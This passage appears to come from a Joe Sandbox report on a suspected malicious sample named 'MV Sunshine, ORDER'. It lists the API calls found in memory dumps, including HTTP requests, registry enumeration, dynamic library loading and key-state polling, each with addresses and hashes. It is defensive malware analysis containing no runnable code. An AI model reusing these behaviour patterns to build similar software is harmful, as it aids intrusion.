                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F1B40
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1B66
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009F1B96
                      • InternetCloseHandle.WININET(00000000), ref: 009F1BDD
                        • Part of subcall function 009F2777: GetLastError.KERNEL32(?,?,009F1B0B,00000000,00000000,00000001), ref: 009F278C
                        • Part of subcall function 009F2777: SetEvent.KERNEL32(?,?,009F1B0B,00000000,00000000,00000001), ref: 009F27A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                      • String ID:
                      • API String ID: 3113390036-3916222277
                      • Opcode ID: 01b24a08f974e12e9d3335342f3d0911e4ce76e63dc84b04d69ca70ccd46f1c5
                      • Instruction ID: 3bd655578b79a3442d8000810fb0e301fcdce040f5f1bbac9d99031a97549b1c
                      • Opcode Fuzzy Hash: 01b24a08f974e12e9d3335342f3d0911e4ce76e63dc84b04d69ca70ccd46f1c5
                      • Instruction Fuzzy Hash: 4E21CFB150020CFFEB21DF608C85FBF77ECEB89745F10412AF605A6240EB249D0697A1
                      APIs
                        • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                        • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                        • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A066D0
                      • LoadLibraryW.KERNEL32(?), ref: 00A066D7
                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A066EC
                      • DestroyWindow.USER32(?), ref: 00A066F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                      • String ID: SysAnimate32
                      • API String ID: 4146253029-1011021900
                      • Opcode ID: fbc01a091fe9021de400d910640aa4ea63943821ff988ff3e8927f077558457d
                      • Instruction ID: 15130c7ff4d53306dd9c9ccd2bb0bbbf3822aff2db15bf6366ae89ed9ad197ee
                      • Opcode Fuzzy Hash: fbc01a091fe9021de400d910640aa4ea63943821ff988ff3e8927f077558457d
                      • Instruction Fuzzy Hash: C9218E71100209AFEF148FA4EC80EAB77ADEB5936CF104629F911961D0D7728C629760
                      APIs
                      • GetStdHandle.KERNEL32(0000000C), ref: 009E705E
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E7091
                      • GetStdHandle.KERNEL32(0000000C), ref: 009E70A3
                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009E70DD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CreateHandle$FilePipe
                      • String ID: nul
                      • API String ID: 4209266947-2873401336
                      • Opcode ID: 30e90f0a51d4090c785731da4cc181e746fa9364a17c62e98d1d82fcd2bd7964
                      • Instruction ID: 407e1e5b1e3bc44532bb899edf0c536316b7022060923f07c5fae2ae799d0e74
                      • Opcode Fuzzy Hash: 30e90f0a51d4090c785731da4cc181e746fa9364a17c62e98d1d82fcd2bd7964
                      • Instruction Fuzzy Hash: 1321AE74504249ABDB219FBADC04B9AB7A8BF54721F204A19FCA0D72D0E7B09D418B51
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 009E712B
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E715D
                      • GetStdHandle.KERNEL32(000000F6), ref: 009E716E
                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009E71A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CreateHandle$FilePipe
                      • String ID: nul
                      • API String ID: 4209266947-2873401336
                      • Opcode ID: 01bb5c8fe8a117cd73641431c68649a547ba24052906ceae0e575b8f80091763
                      • Instruction ID: 1cbe763b510fd52bcb27c243d310d9e678c68fd39085411744a32d104b02b00c
                      • Opcode Fuzzy Hash: 01bb5c8fe8a117cd73641431c68649a547ba24052906ceae0e575b8f80091763
                      • Instruction Fuzzy Hash: 58217475508349ABDB219FAA9C04AA9B7ACAF55730F200A19FDA1E72D0D7709C428762
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 009EAEBF
                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009EAF13
                      • __swprintf.LIBCMT ref: 009EAF2C
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A0F910), ref: 009EAF6A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume__swprintf
                      • String ID: %lu
                      • API String ID: 3164766367-685833217
                      • Opcode ID: 7b099ead206249d6ad4e2723c80bbf1bcc2241d01a714b288e86978b39166fa6
                      • Instruction ID: fea02779906b0f4428773545d2b45ec9506d98b6227a8cbbd12105157826fb1b
                      • Opcode Fuzzy Hash: 7b099ead206249d6ad4e2723c80bbf1bcc2241d01a714b288e86978b39166fa6
                      • Instruction Fuzzy Hash: 20216031A00109AFCB10EF65C985EAE7BB8EF89704B004469F909AB351DB71EE42CB61
                      APIs
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                        • Part of subcall function 009DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009DA399
                        • Part of subcall function 009DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 009DA3AC
                        • Part of subcall function 009DA37C: GetCurrentThreadId.KERNEL32 ref: 009DA3B3
                        • Part of subcall function 009DA37C: AttachThreadInput.USER32(00000000), ref: 009DA3BA
                      • GetFocus.USER32 ref: 009DA554
                        • Part of subcall function 009DA3C5: GetParent.USER32(?), ref: 009DA3D3
                      • GetClassNameW.USER32(?,?,00000100), ref: 009DA59D
                      • EnumChildWindows.USER32(?,009DA615), ref: 009DA5C5
                      • __swprintf.LIBCMT ref: 009DA5DF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                      • String ID: %s%d
                      • API String ID: 1941087503-1110647743
                      • Opcode ID: db56fb55ec902689420480561b6e7347e5210b30ba69d0860e2bd7d849b31355
                      • Instruction ID: 1a7392fda6d254dfe5716f3b12f07bbbf88d221064552d92f28e610e275e2177
                      • Opcode Fuzzy Hash: db56fb55ec902689420480561b6e7347e5210b30ba69d0860e2bd7d849b31355
                      • Instruction Fuzzy Hash: B211B771240208BBDF10BFB4DC85FEA777DAF88700F048076B908AA292DB7499568B75
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 009E2048
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                      • API String ID: 3964851224-769500911
                      • Opcode ID: 279c88774a706d4c8981f1ec3fe43179fce499f8a50888bf6b2eda7754baebbc
                      • Instruction ID: 7ec161bc59ceaa1110a329cd7fb74107e805bd22071d05e3ad8cc8841b49d3cc
                      • Opcode Fuzzy Hash: 279c88774a706d4c8981f1ec3fe43179fce499f8a50888bf6b2eda7754baebbc
                      • Instruction Fuzzy Hash: 5C115E719042198FCF00EFA4D8815EEB7B8FFA6304F108568E85567291DB325D06CB50
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009FEF1B
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009FEF4B
                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009FF07E
                      • CloseHandle.KERNEL32(?), ref: 009FF0FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                      • String ID:
                      • API String ID: 2364364464-0
                      • Opcode ID: e44156c99cdfb6d325f77e9e3bcb48fa662323e79ccfc2ac7fe3b6cff25f5948
                      • Instruction ID: f5f33b93d3689066013781377b4d3715fc3a693d3a66dfed08c9b158f094bae2
                      • Opcode Fuzzy Hash: e44156c99cdfb6d325f77e9e3bcb48fa662323e79ccfc2ac7fe3b6cff25f5948
                      • Instruction Fuzzy Hash: 198164716043019FD724EF28C886F3AB7E5AF88720F14881DF69ADB392DB71AC418B51
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 00A010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A00038,?,?), ref: 00A010BC
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00388
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A003C7
                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A0040E
                      • RegCloseKey.ADVAPI32(?,?), ref: 00A0043A
                      • RegCloseKey.ADVAPI32(00000000), ref: 00A00447
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                      • String ID:
                      • API String ID: 3440857362-0
                      • Opcode ID: 20ebb059a84e012f672806418b86a2dd6cd23a01ac2f6ddcdf2204c0bf5e62be
                      • Instruction ID: 5d3d6edb58ecaa8c392f8728398b914e772649d50ee2b13dd3f226283cdd0162
                      • Opcode Fuzzy Hash: 20ebb059a84e012f672806418b86a2dd6cd23a01ac2f6ddcdf2204c0bf5e62be
                      • Instruction Fuzzy Hash: 56512A31208208AFD714EF64D881F6EB7E8FF84704F54892DF5959B2A1DB31E905CB52
                      APIs
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FDC3B
                      • GetProcAddress.KERNEL32(00000000,?), ref: 009FDCBE
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FDCDA
                      • GetProcAddress.KERNEL32(00000000,?), ref: 009FDD1B
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FDD35
                        • Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7B20,?,?,00000000), ref: 00985B8C
                        • Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7B20,?,?,00000000,?,?), ref: 00985BB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                      • String ID:
                      • API String ID: 327935632-0
                      • Opcode ID: 30aab39fcfcf8ec69af888c6ee5cc8f68d11b793da0f5dcf7f6971d0bb5104d2
                      • Instruction ID: b2f03b1f41a5b99e418e9545f15f92cdce8c40b279c20c523792f0b8efde5a62
                      • Opcode Fuzzy Hash: 30aab39fcfcf8ec69af888c6ee5cc8f68d11b793da0f5dcf7f6971d0bb5104d2
                      • Instruction Fuzzy Hash: B8513A35A01209DFCB00EFA8C484AADB7F5FF59310B158069E959AB361DB31ED45CF91
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009EE88A
                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009EE8B3
                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009EE8F2
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009EE917
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009EE91F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                      • String ID:
                      • API String ID: 1389676194-0
                      • Opcode ID: a97601689afbad973bc8aff8c599139e8106cc731cad84a4ed7d6aedc15fefaf
                      • Instruction ID: d413cce0dd60d778236f7f21aea4b3995ca28848d570c65a7c0bb9e0736e94df
                      • Opcode Fuzzy Hash: a97601689afbad973bc8aff8c599139e8106cc731cad84a4ed7d6aedc15fefaf
                      • Instruction Fuzzy Hash: 1D511E35A00219DFCF15EF65C981AAEBBF5FF49310B188099E849AB362CB31ED11DB50
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ddedacb27a248bfb1f79782e00fe359cd51d3c974f00e12777614ab1866e107e
                      • Instruction ID: 6346cfe96b20feb4d0b763fb6fb76e9fff09b983f18e0ee4d0d83c913590f353
                      • Opcode Fuzzy Hash: ddedacb27a248bfb1f79782e00fe359cd51d3c974f00e12777614ab1866e107e
                      • Instruction Fuzzy Hash: 8B41D53D90030CAFD720DF68EC48FA9BBA4FB19310F154165F856AB2E1D771AD42DA52
                      APIs
                      • GetCursorPos.USER32(?), ref: 00982357
                      • ScreenToClient.USER32(00A467B0,?), ref: 00982374
                      • GetAsyncKeyState.USER32(00000001), ref: 00982399
                      • GetAsyncKeyState.USER32(00000002), ref: 009823A7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AsyncState$ClientCursorScreen
                      • String ID:
                      • API String ID: 4210589936-0
                      • Opcode ID: b19840a7b9ba9e1b5fe566ad2bec9297c0d996509abe71001ab37c7e8b21cea6
                      • Instruction ID: 6799361d81711dec8a803713318959f44b99bfcfd203e157609b4ecb7fa3a462
                      • Opcode Fuzzy Hash: b19840a7b9ba9e1b5fe566ad2bec9297c0d996509abe71001ab37c7e8b21cea6
                      • Instruction Fuzzy Hash: AC419175504119FFDF199FA8C944AEDBB78FF05724F20431AF828A6290C734A950DB91
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D695D
                      • TranslateAcceleratorW.USER32(?,?,?), ref: 009D69A9
                      • TranslateMessage.USER32(?), ref: 009D69D2
                      • DispatchMessageW.USER32(?), ref: 009D69DC
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D69EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                      • String ID:
                      • API String ID: 2108273632-0
                      • Opcode ID: 69ef47e5ebc913dfeb6edea0a9701b4001c85f241b4c748942734ffd41428407
                      • Instruction ID: f7af7a484c294ed37a499c62735a74e92e585601b6a6a2c25eda7c224cf2bc09
                      • Opcode Fuzzy Hash: 69ef47e5ebc913dfeb6edea0a9701b4001c85f241b4c748942734ffd41428407
                      • Instruction Fuzzy Hash: 5D310335980246AECB20CFB4CC84BF67BACAB43300F14852BE061D32A1D776988BC791
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 009D8F12
                      • PostMessageW.USER32(?,00000201,00000001), ref: 009D8FBC
                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009D8FC4
                      • PostMessageW.USER32(?,00000202,00000000), ref: 009D8FD2
                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009D8FDA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessagePostSleep$RectWindow
                      • String ID:
                      • API String ID: 3382505437-0
                      • Opcode ID: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
                      • Instruction ID: 1aa7742931c91a748457def7127067e2ba57ed361bbfb9de4c0210af38fa9e27
                      • Opcode Fuzzy Hash: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
                      • Instruction Fuzzy Hash: FF31DC71500219EFDB10CFACD948AAE7BBAEB04315F10822AF924EA2D1C7B09911CB90
                      APIs
                      • IsWindowVisible.USER32(?), ref: 009DB6C7
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009DB6E4
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009DB71C
                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009DB742
                      • _wcsstr.LIBCMT ref: 009DB74C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                      • String ID:
                      • API String ID: 3902887630-0
                      • Opcode ID: 5ce347dbe8ab1f3fa6239c2ee9ceba204a8f1758efb9e0eacc5f97904adc459e
                      • Instruction ID: 861d0d770c21c7df5e5f2114b11a175f67f287f14b0073fb81a6f087f955e5d9
                      • Opcode Fuzzy Hash: 5ce347dbe8ab1f3fa6239c2ee9ceba204a8f1758efb9e0eacc5f97904adc459e
                      • Instruction Fuzzy Hash: FD212C32244244FFEB259B799C49E7B7B9CDF85760F11803AFC05DA261EF61CC4192A0
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • GetWindowLongW.USER32(?,000000F0), ref: 00A0B44C
                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A0B471
                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A0B489
                      • GetSystemMetrics.USER32(00000004), ref: 00A0B4B2
